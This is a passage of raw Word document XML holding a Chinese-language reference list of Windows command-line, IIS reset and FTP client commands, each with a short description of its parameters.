        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>创建目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">replace </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>源文件　要替换文件的目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>替换文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">ren </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>原文件名　新文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>重命名文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">tree  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>以树形结构显示出目录，用参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将列出第个文件夹中文件名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示文本文件的内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">more </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>逐屏显示输出文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">doskey </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>要锁定的命令＝字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">doskey </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>要解锁命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>提供的锁定命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>编辑命令行，重新调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>win2k</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令，并创建宏</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。如：锁定</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>dir</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>doskey dir=entsky (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>不能用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>doskey dir=dir)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>；解锁：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>doskey dir=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">taskmgr </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>调出任务管理器</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">chkdsk /F D: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>检查磁盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>并显示状态报告；加参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>并修复磁盘上的错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>tlntadmn telnt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>admn,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>键入</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>tlntadmn</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，再选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>8,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>就可以更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务默认端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为其它任何端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">exit  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>退出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>程序或目前，用参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>则是退出当前批处理脚本而不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">path </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>可执行文件的文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为可执行文件设置一个路径。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">cmd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>启动一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>win2K</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令解释窗口。参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/eff</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/en </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>关闭、开启命令扩展；更我详细说明见</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>cmd /?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">regedit /s </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注册表文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>导入注册表；参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指安静模式导入，无任何提示；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">regedit /e </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注册表文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>导出注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">cacls </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名　参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示或修改文件访问控制列表（</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ACL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>格式时。参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/D </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设定拒绝某用户访问；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/P </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">:perm </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>替换指定用户的访问权限；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/G </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">:perm </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>赋予指定用户访问权限；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">Perm </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>可以是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">: N </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>无，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">R </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>读取，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> W </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>写入，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> C </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>写入</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">F </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>完全控制；例：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">cacls D:\test.txt /D pub </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设定</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>d:\test.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>pub</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户访问。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">cacls </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看文件的访问用户权限列表</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">REM </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文本内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在批处理文件中添加注解</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">netsh  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看或更改本地网络配置情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">iisreset /reboot  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>重启</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>win2k</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>计算机（但有提示系统将重启信息出现）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>iisreset /start</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">stop  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>启动（停止）所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">iisreset /restart  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>停止然后重新启动所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">iisreset /status  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>iisreset /enable</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">disable  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在本地系统上启用（禁用）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务的重新启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">iisreset /rebootonerror  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>当启动、停止或重新启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务时，若发生错误将重新开机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">iisreset /noforce  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>若无法停止</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务，将不会强制终止</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>iisreset /timeout  Val</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在到达逾时间（秒）时，仍未停止</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务，若指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/rebootonerror</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数，则电脑将会重新开机。预设值为重新启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>秒，停止</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>秒，重新开机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>秒。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">FTP </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>后面有详细说明内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的命令行格式为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">ftp </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>－</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">v </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>－</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>－</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>－</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>－</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>g[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>主机名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>－</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">v </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示远程服务器的所有响应信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>－</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>使用调试方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>－</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>限制</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的自动登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>即不使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>.netrc</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>－</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">g </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>取消全局文件名。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>help [</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> /?[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看命令说明</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">bye </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> quit </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>终止主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>并退出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>管理方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">pwd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>列出当前远端主机目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">put </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> send </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>本地文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>上传到主机上的文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将本地一个文件传送至远端主机中</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">get </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> recv [</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>远程主机文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>] [</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>下载到本地后的文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>从远端主机中传送至本地主机中</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">mget [remote-files]  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>从远端主机接收一批文件至本地主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">mput local-files </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将本地主机中一批文件传送至远端主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">dir </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> ls [remote-directory] [local-file]  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>列出当前远端主机目录中的文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果有本地文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>就将结果写至本地文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">ascii </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设定以</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>方式传送文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>缺省值</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">bin </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> image </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设定以二进制方式传送文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">bell </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>每完成一次文件传送</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>报警提示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
